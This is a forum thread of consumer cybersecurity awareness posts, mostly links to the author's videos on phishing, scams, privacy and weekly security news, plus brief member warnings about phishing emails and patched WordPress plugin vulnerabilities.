(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/11/15/54/c3lXoLVvrjZ/preview.jpg)
This one was sent from the following email address:
from: Thank-You** <-PAWTXGNZFLBOL@housedump.best
All the emails have the same theme. You are always a Winner of some kind.
If you react to any of the links that are part of this email,
They are the winner and you loose.
There have been SPAM and PHISHING campaigns in the past that managed to
get past the spam filter in Gmail but this campaign seems to have stumped GOOGLE
it's been going on far too long.
-
I think we all need to be more wary of such emails.
For more years than I can remember I have been using MailWasher (and eventually Mail Washer Pro, paid version). That pre filters the email service/s you use. That doesn't download emails, but just a part of it (but leaves it on the mail server), it looks for spam/scams. It is also very highly configurable and the partial email can be viewed by the user in plain text (within the MailWasher program), no images calling home or beacons to confirm receipt, etc.
You can examine the headers and email content, flag it as spam or to add to blacklist or to bounce. Once done it deletes any emails flagged as spam from the email server and calls your email client. You then download only the email you wanted.
Whilst it is a paid program, I bought a lifetime license many years ago (great deal I couldn't turn down) and it has served me well over the years.
-
Just to clarify, the email I've received has been marked as spam.
So have all the others that are very similar in appearance but,
new email addresses are used and new ISP's are used and the spam continues
as it would even if I were to use a third party spam blocker.
-
Amazon launches another controversial ad feature
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/12/20/50/c3llYKVvTFF/preview.jpg)
https://youtu.be/kFkNFQygYCs (https://youtu.be/kFkNFQygYCs)
This video explains a new ads feature offered by Amazon that may raise
unacceptable privacy concerns.
This video is based on information obtained from an article at ghacks.net.
Read it here: https://bit.ly/3W5D56S (https://bit.ly/3W5D56S)
-
Phishing - Vishing - Smishing
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/14/21/16/c3l2rDVvxlR/preview.jpg)
https://youtu.be/P3ye21crXfo (https://youtu.be/P3ye21crXfo)
Knowing the differences between these terms can help you stay safe online.
Avast Software provided the definitions. https://www.avast.com/ (https://www.avast.com/)
-
Don’t Fall for These Common Holiday Scams
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/15/23/00/c3lo0cVvamG/preview.jpg)
https://youtu.be/fl6a3jlS8CY (https://youtu.be/fl6a3jlS8CY)
The holiday season is here, whether you’re happy about it or are a grinch.
It’s a time to shop, enjoy the festivities, and spend time with family,
but make sure you avoid all the holiday fraud. Unfortunately, every year,
thousands of people fall victim to scams.
My thanks to Cory Gunther for his excellent article on this topic.
Please read his article here: https://bit.ly/3PsKpHy (https://bit.ly/3PsKpHy)
-
Weekly Security News Roundup w/e 12-16-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/16/15/03/c3lDoeVvApB/preview.jpg)
https://youtu.be/Lu2hnthL6iM (https://youtu.be/Lu2hnthL6iM)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Every new tech toy can be a potential privacy and security concerns
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/19/20/40/c3lqYkVv5qX/preview.jpg)
https://youtu.be/1ijSuksGKbI (https://youtu.be/1ijSuksGKbI)
Let’s take a look at some of this year's hottest tech gadgets and the potential privacy risks
that come with each.
My thanks to Emma McGowan for this info and the inspiration for the video.
You can read her article here: https://bit.ly/3HND3wG (https://bit.ly/3HND3wG)
-
Weekly Security News Roundup w/e 12-23-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/23/14/57/c3l02PVvMrI/preview.jpg)
https://youtu.be/slL3bNlvBo8 (https://youtu.be/slL3bNlvBo8)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
WordPress websites being attacked through YITH WooCommerce Gift Cards plug-in.
Vulnerable through a leak known as CVE-2022-45359. Vulnerable could be 56.567 websites with that particular plug-in.
Update as soons as possible to version 3.20.0 -> https://yithemes.com/themes/plugins/yith-woocommerce-gift-cards/
polonus
-
Caution with this "Expiring Soon" email.
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/29/13/44/c3lUIEVvWHg/preview.jpg)
You'll be a LOOSER as soon as you click anywhere on or in that email.
It's a Phishing Scam. Report it as Spam.
This same type of email spam has been arriving in your Gmail folder
for quite some time. Google still hasn't figured out how to block it.
Be careful and never click on something that promises to deliver anything
for FREE. There is no free lunch. Stay safe.
-
You'll be a LOOSER as soon as you click anywhere on or in that email.
It's a Phishing Scam. Report it as Spam.
The problem with this, even if you don't reply, the chances you have already lost.
Many such emails in order to display images they phone home to display the image and basically confirm the receipt of the email. In the old days this was known as a web beacon/tracker and you may not even see an image as it can be as small as 1 pixel.
This is one of the reasons I run MailWasher Pro to pre vet my emails, it downloads a small part of the email and is displayed in plain text, you can view the code behind the content and it pre vets against a number of spam/scam resources. At this point I can flag/mark it for deletion from the server or banning the sender, etc.
Once MailWasher does that it then calls your email program to download the remainder of your emails.
-
You'll be a LOOSER as soon as you click anywhere on or in that email.
It's a Phishing Scam. Report it as Spam.
The problem with this, even if you don't reply, the chances you have already lost.
Many such emails in order to display images they phone home to display the image and basically confirm the receipt of the email. In the old days this was known as a web beacon/tracker and you may not even see an image as it can be as small as 1 pixel.
This is one of the reasons I run MailWasher Pro to pre vet my emails, it downloads a small part of the email and is displayed in plain text, you can view the code behind the content and it pre vets against a number of spam/scam resources. At this point I can flag/mark it for deletion from the server or banning the sender, etc.
Once MailWasher does that it then calls your email program to download the remainder of your emails.
Please note, my email is strictly via online. There is no email server to contact and remove the item.
This item normally would also not have been opened but directly marked as spam and added to the blocked listing.
-
You'll be a LOOSER as soon as you click anywhere on or in that email.
It's a Phishing Scam. Report it as Spam.
The problem with this, even if you don't reply, the chances you have already lost.
Many such emails in order to display images they phone home to display the image and basically confirm the receipt of the email. In the old days this was known as a web beacon/tracker and you may not even see an image as it can be as small as 1 pixel.
<snip>
Please note, my email is strictly via online. There is no email server to contact and remove the item.
This item normally would also not have been opened but directly marked as spam and added to the blocked listing.
Not necessarily just for you Bob, but to let others know the dangers in just receiving and viewing emails, can be calling home.
-
Weekly Security News Roundup w/e 12-30-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/12/30/16/44/c3lvDEVwVMF/preview.jpg)
https://youtu.be/QREK7u81mt8 (https://youtu.be/QREK7u81mt8)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Stay Protected in 2023 with these 9 Cybersecurity Tips
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/02/02/01/c0VnnVVweMH/preview.jpg)
https://youtu.be/D1gkBS8atpA (https://youtu.be/D1gkBS8atpA)
As new technology emerges, cybersecurity protocols also evolve.
The following are some basic tips you should carry with you everywhere to stay better protected against cyber attacks.
Here are some general rules to follow to stay safe in 2023.
My thanks to an article in How-To Geek for the inspiration of this video.
You can read the whole article at: https://bit.ly/3IhUPZc (https://bit.ly/3IhUPZc)
-
Weekly Security News Roundup w/e 1-6-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/06/09/52/c0V1QsVwool/preview.jpg)
https://youtu.be/s9Gihl71VGM (https://youtu.be/s9Gihl71VGM)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Antivirus Exception? Think Twice
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/13/17/18/c0VIbFVwans/preview.jpg)
https://youtu.be/tJww9LIyjt0 (https://youtu.be/tJww9LIyjt0)
Think twice before you add anything to exceptions,
even if an antivirus detection dialogue annoys you in the moment.
My thanks to the Avast Threat Labs for their inspiration for this video.
https://blog.avast.com/exceptions-risks (https://blog.avast.com/exceptions-risks)
-
Weekly Security News Roundup w/e 1-13-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/13/23/40/c0VI0kVwa80/preview.jpg)
https://youtu.be/Auc8G3SyaEM (https://youtu.be/Auc8G3SyaEM)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Scammers are targeting online secondhand shopping platforms
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/16/04/26/c0VDfOVwBk7/preview.jpg)
https://youtu.be/n33dLD8Cjew (https://youtu.be/n33dLD8Cjew)
In general, we don’t need to look much further than popular places where people do business
to find cybercriminals and scammers perpetrating their crimes. I’m about to dive into a case
of theft that took place on Vinted’s platform, but this kind of crime could have started in many
different marketplaces of this kind. My thanks to Luis Corrins for his information on this topic.
You’ll find his article here: https://bit.ly/3XAmqZO (https://bit.ly/3XAmqZO)
-
What's on the Dark Web in 2023?
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/18/23/13/c0VF0IVwJ5m/preview.jpg)
https://youtu.be/57ILheI0NB4 (https://youtu.be/57ILheI0NB4)
The vast majority of what we know and use daily is the "surface web,"
which includes all the sites that can be easily accessed through a search engine like Google or Bing.
But beyond the surface web lies a much larger and mysterious realm known as the "deep web."
And within that deep web lies an even more secretive and controversial corner of the internet
known as the "dark web.“ My thanks to Emma McGowan for her excellent article on the Avast Blog
and the inspiration for this video. https://bit.ly/3ks2qul (https://bit.ly/3ks2qul)
-
Weekly Security News Roundup w e 1-20-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/20/23/16/c0VY0DVwNHw/preview.jpg)
https://youtu.be/L8dxCV4ftmw (https://youtu.be/L8dxCV4ftmw)
Security-related news thanks mostly to Avast Software. https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc) I'm just a messenger. They do most of the challenging research. Links to the articles referenced in this video are part of the video show notes.
-
Security News Flash - T-Mobile Hacked Again
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/20/22/28/c0VY3uVwNp8/preview.jpg)
https://youtu.be/xtdm1heBZY0 (https://youtu.be/xtdm1heBZY0)
T-Mobile has admitted that hackers were able to steal the information
of around 37 million postpaid and prepaid customers in another major data breach.
The carrier said in a regulatory filing that it discovered the issue on January 5th.
Read more at Engadget - https://engt.co/3QSxxeG (https://engt.co/3QSxxeG)
-
What are the risks of malicious USBs?
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/26/23/19/c0VO0qVx6gN/preview.jpg)
https://youtu.be/j9Zg8BU6ADg (https://youtu.be/j9Zg8BU6ADg)
USB flash drives are still a common way for attackers to infect computers with viruses and malware.
They can damage your devices and data in seconds. If you think this can't happen to you, think again!
My thanks to an Avast Blog article for inspiration for this video (Author unknown):
https://blog.avast.com/malicious-usb-devices (https://blog.avast.com/malicious-usb-devices)
-
AI in cybersecurity - The good, the bad, and the ugly
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/27/16/11/c0VtDXVxlLR/preview.jpg)
https://youtu.be/XC1SJFIAXE8 (https://youtu.be/XC1SJFIAXE8)
AI technology has advanced to the level that it’s now at a pivotal point.
My thanks to Luis Corrons for his excellent article and the inspiration for this video.
You’ll find his article on the Avast Blog at the following link: https://blog.avast.com/ai-cybersecurity (https://blog.avast.com/ai-cybersecurity)
-
Weekly Security News Roundup w/e 1-27-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/01/27/23/32/c0Vt0xVx2fK/preview.jpg)
https://youtu.be/M7U_aC8cocQ (https://youtu.be/M7U_aC8cocQ)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
-
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
bob, is the avast link in your post above the one that you intended?
-
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
bob, is the avast link in your post above the one that you intended?
Avast Free - Yes
-
Is ChatGPT's use of people's data even legal?
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/01/20/06/c0nVY1Vxt7Y/preview.jpg)
https://youtu.be/8IKco-yzLhE
Currently, there is no widely accepted method for individuals to request the removal
of their data from a machine learning model once it has been used to train the model.
My thanks to Emma McGowan for her excellent article on this topic in the Avast Blog
and the inspiration for this video. You’ll find her article at the following link:
https://blog.avast.com/chatgpt-data-use-legal (https://blog.avast.com/chatgpt-data-use-legal)
Currently, there is no widely accepted method for individuals to request the removal
of their data from a machine learning model once it has been used to train the model.
-
Weekly Security News Roundup w/e 2-3-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/04/00/19/c0nfcqVxaHB/preview.jpg)
https://youtu.be/TVIQq1Bf8h8
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Kaspersky's mentions that Google and MailChimp are the most aggressive trackers on the Interwebz.
Re: https://securelist.com/web-beacons-on-websites-and-in-email/108632/
polonus
-
10 expert tips for filing taxes online without getting your identity stolen
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/09/19/47/c0nQqHVxsSH/preview.jpg)
https://youtu.be/BnPRLkQBzH4 (https://youtu.be/BnPRLkQBzH4)
Filing your taxes doesn't have to be a stressful experience – with a little bit of planning
and preparation, you can get your taxes done quickly and safely. My thanks to Emma McGowan
for her excellent article in the Avast Blog on this topic and forthe inspiration of this video.
You’ll find her article at the following link: https://blog.avast.com/tips-filing-taxes-online (https://blog.avast.com/tips-filing-taxes-online)
-
Weekly Security News Roundup w/e 2-10-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/10/16/37/c0n6DAVx8cy/preview.jpg)
https://youtu.be/O1c2JzI_eFQ
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Safe dating in the digital age
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/12/14/19/c0nl2qVxR18/preview.jpg)
https://youtu.be/8hWvQdJf59k (https://youtu.be/8hWvQdJf59k)
Romance scams are at an all time high.
This Valentine's Day, keep your online dating life fun and romantic.
Follow these safety tips. My thanks to Malea Lamb-Hall for her article on the Avast blog
and the inspiration for this video. You’ll find her article here:
https://blog.avast.com/online-dating-safety-tips-avast (https://blog.avast.com/online-dating-safety-tips-avast)
-
Smishing: The elephant in the room
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/12/17/41/c0nlbpVxR3q/preview.jpg)
https://youtu.be/llHdk44d-I4 (https://youtu.be/llHdk44d-I4)
It's important to be vigilant and cautious when receiving text messages from unknown or unexpected sources.
My thanks to Luis Corrons for his inspirational article on this topic which you’ll find here: https://bit.ly/3jOYDqU (https://bit.ly/3jOYDqU)
-
Weekly Security News Roundup w/e 2-17-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/17/20/40/c0nbYkVyD6A/preview.jpg)
https://youtu.be/-i6FT0qsre8 (https://youtu.be/-i6FT0qsre8)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Website redirect issues hamper hostingserver GoDaddy:
https://aboutus.godaddy.net/newsroom/company-news/news-details/2023/Statement-on-recent-website-redirect-issues/default.aspx
Not the first time around this happens at GoDaddy's :(
polonus
-
What is Phishing and can you Protect against it?
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/19/15/26/c0nqoOVyFGx/preview.jpg)
https://youtu.be/5rAYNlsIxsI (https://youtu.be/5rAYNlsIxsI)
Find out what Phishing is and how to protect against becoming a victim.
I used both ChatGPT and Pictory.ai in the creation of this video.
ChatGPT supplied the answer to the question I posed. Pictory.ai created the video.
I used my voice for the narration and Screencast-O-Matic for the editing.
-
ENISA warns - https://cert.europa.eu/blog/sustained-activity-by-specific-threat-actors
Information stealing spygroups, like APT27, APT30, APT31, Ke3chang, Gallium and Mustang Panda
attack government institutions. Avoid commom misakes in incident handling.
Re: https://cert.europa.eu/files/data/TLP-CLEAR-JointPublication-23-01.pdf
polonus
-
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
bob, is the avast link in your post above the one that you intended?
Avast Free - Yes
I just want to clarify, does it make sense to switch to the paid version, or will the level of security remain the same?
-
Focused View, turning TikTok into a privacy nightmare:
https://www.tiktok.com/business/en/blog/tiktok-world-focused-view
Warnings against it here:
https://edri.org/our-work/tiktoks-focused-view-the-creepy-new-feature-aims-to-monetise-your-emotions/
polonus
-
Weekly Security News Roundup w/e 2-24-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/24/16/46/c0nZDmVyz7K/preview.jpg)
https://youtu.be/ONvMlOoiNFg
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Some Timely Advice from Avast
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/02/27/16/01/c0ntDVVy5w4/preview.jpg)
https://youtu.be/EdlA44kizOo (https://youtu.be/EdlA44kizOo)
Avast is warning about trusting Google's search results.
-
Weekly Security News Roundup w e 3-3-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/03/04/17/01/c0efbVVySAW/preview.jpg)
https://youtu.be/EWy5JbcleBk (https://youtu.be/EWy5JbcleBk)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Scammers are using AI voices to steal millions by impersonating loved ones
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/03/07/20/07/c0eiYiV4iGq/preview.jpg)
https://youtu.be/rO5nuv-EVD0 (https://youtu.be/rO5nuv-EVD0)
Over 5,000 victims were conned out of their money through the phone in 2022.
AI voice-generating software is allowing scammers to mimic the voice of loved ones.
Credit for the information in this video belongs to Ryan McNeal for his article in
Android Authority. Read his article by following the link listed. https://bit.ly/3kUIZuG (https://bit.ly/3kUIZuG)
-
Weekly Security News Roundup w/e 3-10-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/03/10/23/15/c0e60oV4qn7/preview.jpg)
https://youtu.be/XjZyIbZmrSg (https://youtu.be/XjZyIbZmrSg)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Stalkerware Has Grown by 239% Worldwide
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/03/14/21/18/c0e2rFV4UZA/preview.jpg)
https://youtu.be/gricighW--g (https://youtu.be/gricighW--g)
Stalkerware is often installed secretly on mobile phones by abusive spouses,
ex-partners, and other close contacts to spy on their targets.
My thanks to Avast for their article on this topic. You'll find it at:
https://blog.avast.com/worldwide-stalkerware-trends (https://blog.avast.com/worldwide-stalkerware-trends)
-
Weekly Security News Roundup w/e 3-17-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/03/17/21/14/c0ebr2V4kXn/preview.jpg)
https://youtu.be/ZFAwMTpHIOY (https://youtu.be/ZFAwMTpHIOY)
This weeks important Security News gathered from many sources across the internet.
My Thanks to Avast : https://www.avast.com/en-us/about#pc (https://www.avast.com/en-us/about#pc)
Links to the articles referenced in this video are part of the video show notes.
-
Amazon Call Scams Are On The Rise
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/03/17/21/47/c0ebrHV4k2L/preview.jpg)
https://youtu.be/UmLZtLWb48k (https://youtu.be/UmLZtLWb48k)
Here’s what you need to know to recognize these scams and keep your information safe.
My thanks to Emma McGowan for her article on this topic and the catalyst for this video.
Read her entire article here: https://blog.avast.com/amazon-call-scams (https://blog.avast.com/amazon-call-scams)
-
Amazon Call Scams Are On The Rise
<snip image>
https://youtu.be/UmLZtLWb48k (https://youtu.be/UmLZtLWb48k)
Here’s what you need to know to recognize these scams and keep your information safe.
My thanks to Emma McGowan for her article on this topic and the catalyst for this video.
Read her entire article here: https://blog.avast.com/amazon-call-scams (https://blog.avast.com/amazon-call-scams)
I would be suspect of any call asking for this information:
"Has someone claiming to be an account executive from Amazon ever called asking for your Amazon account number, etc."
I would hope any real Amazon, account executive would already have this account number information, as I haven't got a clue what it is :)
Even so if I ever got something like this my first action (after hanging up) would be to check my orders.
-
Weekly Security News Roundup w/e 3-24-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/03/24/20/36/c0eZYzV4WaF/preview.jpg)
https://youtu.be/_5v2wNWeb5c (https://youtu.be/_5v2wNWeb5c)
This weeks important Security News gathered from many sources across the internet.
My Thanks to Avast for their support: https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
Links to the articles referenced in this video are part of the video show notes.
-
Instagram "Shein Gift Card Scam" - It can happen to YOU
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/03/25/12/09/c0eTlQVacx4/preview.jpg)
In yesterday's edition of the "Weekly Security News Roundup"
the section on the Must Read on the Avast Blog featured an article
by Luis Corrons (https://blog.avast.com/author/luis-corrons) who is a very knowledgeable Avast Security Evangelist on this very topic.
In this mornings Email, I receive this very well documented Scam email in my inbox.
Here are some of the screenshot I took to hopefully help you
be more aware that this could also be sent to you. Don't Fall for the Scam.
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/03/25/12/11/c0eTlXVacxz/preview.jpg)
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/03/25/12/21/c0eTlrVacxR/preview.jpg)
You are a winner if you place this email in the SPAM Folder.
You are a looser if you click on the button.
Paying attention to great advice helps you be aware of the dangers.
Ultimately, it's still up to you to follow that advice or not.
Stay safe. Dangers are all around us. Be aware and follow the advice offered.
-
6 Tricks That Won’t Secure Your Wi-Fi (And 6 That Will)
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/03/30/01/32/c0evVxVa2oX/preview.jpg)
https://youtu.be/w-jua3xi4H4 (https://youtu.be/w-jua3xi4H4)
There are a lot of Wi-Fi security tips that don't secure your Wi-Fi network against intrusion.
So, skip them and focus on the security-enhancing tips and tricks that do.
Thanks to Jason Fitzpatrick for his helpful article which prompted this video.
Please read his full article at: https://tinyurl.com/2ovgnb3m (https://tinyurl.com/2ovgnb3m)
-
Weekly Security News Roundup w/e 3-31-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/03/31/22/30/c0ew3vVaYPd/preview.jpg)
https://youtu.be/z24Zl1rjVsQ (https://youtu.be/z24Zl1rjVsQ)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
A VPN Offers Protection Against The Eight Most Common Hacks
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/04/05/21/47/c0fhrHVa4b3/preview.jpg)
https://youtu.be/GpNghVISyGE (https://youtu.be/GpNghVISyGE)
Your basic protection should include an Antivirus, a Firewall, a Password Manager, and a VPN.
I use Avast for my Antivirus, the Firewall that's part of Windows 11, Dashlane for my Password Manager,
and the Google One VPN. See the Video Show notes for the links mentioned in the video.
-
Weekly Security News Roundup w e 4-7-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/04/07/19/47/c0fiqHVagbd/preview.jpg)
https://youtu.be/1OMfGoy4-a0 (https://youtu.be/1OMfGoy4-a0)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video' are part of the video show notes.
-
Cyber spring cleaning: Maintaining your digital home
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/04/11/10/41/c0fX6pVamf1/preview.jpg)
https://youtu.be/pW4-yC0WOVw (https://youtu.be/pW4-yC0WOVw)
A year-round cyber cleaning routine will ensure a peace of mind.
My thanks to Emma McGowan for her excellent article
which was the inspiration for this video.
You'll find her article here: https://tinyurl.com/2dl5ql4o (https://tinyurl.com/2dl5ql4o)
You'll find Avast's products here: https://www.avast.com/en-us/store#pc (https://www.avast.com/en-us/store#pc)
-
Two Factor Authentication (2FA): Why use it — What are the best options?
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/04/13/21/07/c0fIriVaNjd/preview.jpg)
https://youtu.be/KU8pLA7UfEc (https://youtu.be/KU8pLA7UfEc)
Your passwords will be stolen. It’s not a matter of “if,” it is a matter of “when” and “how many times.”
To stay safe, remember, 1+1=2FA
My thanks to Luis Corrons for his insight on this topic.
Find out more about Luis and his articles at https://tinyurl.com/2k5oxcba (https://tinyurl.com/2k5oxcba)
-
Weekly Security News Roundup w/e 4-14-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/04/14/20/51/c0f2Y7VaPK8/preview.jpg)
https://youtu.be/m6nDIa2Y5ig (https://youtu.be/m6nDIa2Y5ig)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Cyber spring cleaning
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/04/19/11/06/c0fqX1VziOf/preview.jpg)
https://youtu.be/HF2EsHAGoqI (https://youtu.be/HF2EsHAGoqI)
From daily routines to monthly rituals, here’s to your cyber health!
My thanks to Emma McGowan for her excellent article on this topic.
You'll find her article here: https://blog.avast.com/digital-home-hygiene-checklist (https://blog.avast.com/digital-home-hygiene-checklist)
-
Weekly Security News Roundup w/e 4-21-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/04/21/23/38/c0fr0BVzDiL/preview.jpg)
https://youtu.be/glhBx4stVg0 (https://youtu.be/glhBx4stVg0)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
A Microsoft Edge feature is sharing the sites you visit with Bing
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/04/26/19/05/c0fOqhVzuP3/preview.jpg)
https://youtu.be/fLPqZhFkSLY (https://youtu.be/fLPqZhFkSLY)
A potential privacy issue in Edge. This needs to be addressed ASAP.
If you don't want to pass all the websites you visit in Edge onto Bing,
make this change now.
-
Weekly Security News Roundup w/e 4-28-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/04/29/01/59/c0fUVRVzzJ2/preview.jpg)
https://youtu.be/JvH2ZCfVKYg (https://youtu.be/JvH2ZCfVKYg)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup w/e 5-5-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/05/05/22/01/c0hh3VVzNkz/preview.jpg)
https://youtu.be/qFWskv7XMKg (https://youtu.be/qFWskv7XMKg)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup w/e 5-12-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/05/12/19/09/c0hlqQVAlsG/preview.jpg)
https://youtu.be/sbbsaxvLt7I (https://youtu.be/sbbsaxvLt7I)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Actively abused XSS-hole within WordPress Custom Fields plug-in.
Re: https://www.akamai.com/blog/security-research/attackers-leverage-sample-exploit-wordpress-plugin
polonus
-
Weekly Security News Roundup w/e 5-19-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/05/19/21/30/c0hqrvVAxxs/preview.jpg)
https://youtu.be/WxC659wwoMg (https://youtu.be/WxC659wwoMg)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup w/e 5-26-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/05/28/01/40/c0huVkVAMZd/preview.jpg)
https://youtu.be/hf3OcP7855c (https://youtu.be/hf3OcP7855c)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
AI - Are We at Risk or Another Doomsday Theory?
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/06/02/09/45/c01nQGVB1ul/preview.jpg)
https://youtu.be/foXT_o9GJlM (https://youtu.be/foXT_o9GJlM)
I spotted and read the following article yesterday:
https://www.safe.ai/statement-on-ai-risk (https://www.safe.ai/statement-on-ai-risk)
You can even sign their petition if you agree with their point of view.
You'll not find my name on that petition.
Is this new AI revolution really going to cause the end of Civilization?
If it is, I'm in trouble.
-
Weekly Security News Roundup WE 6-2-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/06/02/23/18/c01n0FVBjD2/preview.jpg)
https://youtu.be/cghQGkGJH1Y (https://youtu.be/cghQGkGJH1Y)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup w/e 6-9-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/06/10/13/30/c016IvVBtDI/preview.jpg)
https://youtu.be/8rM5Ui1SjY8 (https://youtu.be/8rM5Ui1SjY8)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Your essential cybersecurity checklist for safe summer travel
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/06/14/13/48/c012IJVBA1k/preview.jpg)
https://youtu.be/l10kh5M8ZH8 (https://youtu.be/l10kh5M8ZH8)
Here is a checklist to put together ahead of your summer travels.
Following that list will ensure a safe and enjoyable summer vacation.
My thanks to my friend Luis Corrons for his article which prompted this video.
You'll find his article at https://tinyurl.com/248m868z (https://tinyurl.com/248m868z)
You can get Avast's SecureLine VPN at: https://www.avast.com/secureline-vpn#pc (https://www.avast.com/secureline-vpn#pc)
-
Can't find a thread to post this in so I will post here.
